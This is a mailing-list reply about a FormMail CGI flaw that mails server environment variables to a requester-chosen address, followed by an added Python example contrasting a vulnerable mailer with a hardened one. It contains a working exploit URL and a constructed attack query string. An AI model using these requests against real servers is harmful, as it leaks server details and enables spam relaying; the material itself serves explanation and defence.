
RE: [cobalt-users] CGI email



>
> http://www.securiteam.com/exploits/FormMail_discloses_environment_variables_information.html
>
> Geezus! Securiteam.com lets anybody submit a so-called "exploit" and they
> publish it without checking it out????

Checking what out? The exploit they published works.
Exploit:
http://www.example.com/cgi-bin/formmail.cgi?env_report=PATH&recipient=cache@dowebs.com&required=&firstname=&lastname=&email=&message=&Submit=<message>

> The env_report simply allows the owner of the script, or any other
> approved recipient, to email himself the value of an environment
> variable. It does NOT somehow magically allow the author of the so-called
> exploit, or anyone else, to email himself that value, or anything else.

He doesn't have to email himself anything. All the spammer needs to do is as
above.

--
Dan Kriwitsky
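The point of the exchange above is that a form mailer which takes both the recipient address and the list of environment variables to report from the query string will send whatever the requester asks for, to whoever the requester names. The following is an added example, not code from the original message or from FormMail itself: a small Python stand-in for such a CGI handler, in a version that trusts every parameter and a version that checks the recipient against a server-side allow list and restricts env_report to a short safe set. The environment values, the allowed recipient, the attacker's address and the two sample query strings are all constructed for this example.

```python
from urllib.parse import parse_qs

# Constructed stand-in for the environment a web server hands a CGI script.
# The values are made up for this example.
SAMPLE_ENV = {
    "PATH": "/usr/local/bin:/usr/bin:/bin",
    "SERVER_SOFTWARE": "Apache/1.3",
    "REMOTE_ADDR": "203.0.113.7",
}

# Hypothetical owner configuration: the only addresses mail may go to.
ALLOWED_RECIPIENTS = {"webmaster@example.com"}

# Environment variables that are harmless to echo back to an allowed recipient.
SAFE_ENV_REPORT = {"REMOTE_ADDR", "HTTP_USER_AGENT"}

# Constructed request of the same shape as the one quoted in the thread:
# the requester names the recipient and asks for PATH to be reported.
ATTACK_QUERY = ("env_report=PATH&recipient=attacker@example.net&required="
                "&firstname=&lastname=&email=&message=hello&Submit=send")

# Constructed request from a legitimate form on the owner's own site.
OWNER_QUERY = "env_report=PATH,REMOTE_ADDR&recipient=Webmaster@example.com&message=hello"


def _message_lines(params):
    """Body lines built from the form's message field(s)."""
    return [f"message: {m}" for m in params.get("message", [])]


def build_mail_vulnerable(query, env=SAMPLE_ENV):
    """Mailer that trusts every query parameter.

    Returns (recipient, body). Both the destination address and the list of
    environment variables copied into the body come straight from the request,
    so any requester can have any variable mailed to any address.
    """
    params = parse_qs(query, keep_blank_values=True)
    recipient = params.get("recipient", [""])[0]
    body = _message_lines(params)
    for var in params.get("env_report", [""])[0].split(","):
        var = var.strip()
        if var:
            body.append(f"{var}: {env.get(var, '')}")
    return recipient, "\n".join(body)


def build_mail_hardened(query, env=SAMPLE_ENV,
                        allowed=ALLOWED_RECIPIENTS, safe_env=SAFE_ENV_REPORT):
    """Same mailer with two server-side checks.

    Returns None when the recipient is not on the owner's allow list, so no
    mail is sent at all; otherwise returns (recipient, body) with env_report
    entries outside the safe set silently dropped. Checking the Referer header
    instead would not help: the requester controls that header too.
    """
    params = parse_qs(query, keep_blank_values=True)
    recipient = params.get("recipient", [""])[0].strip().lower()
    if recipient not in allowed:
        return None
    body = _message_lines(params)
    for var in params.get("env_report", [""])[0].split(","):
        var = var.strip()
        if var in safe_env:
            body.append(f"{var}: {env.get(var, '')}")
    return recipient, "\n".join(body)


if __name__ == "__main__":
    print("vulnerable, attacker query:", build_mail_vulnerable(ATTACK_QUERY))
    print("hardened, attacker query:  ", build_mail_hardened(ATTACK_QUERY))
    print("hardened, owner query:     ", build_mail_hardened(OWNER_QUERY))
```

Run as a script, the vulnerable handler mails the server's PATH to the attacker's address, the hardened one refuses the same request outright, and the owner's own form still works but only gets REMOTE_ADDR back, not PATH.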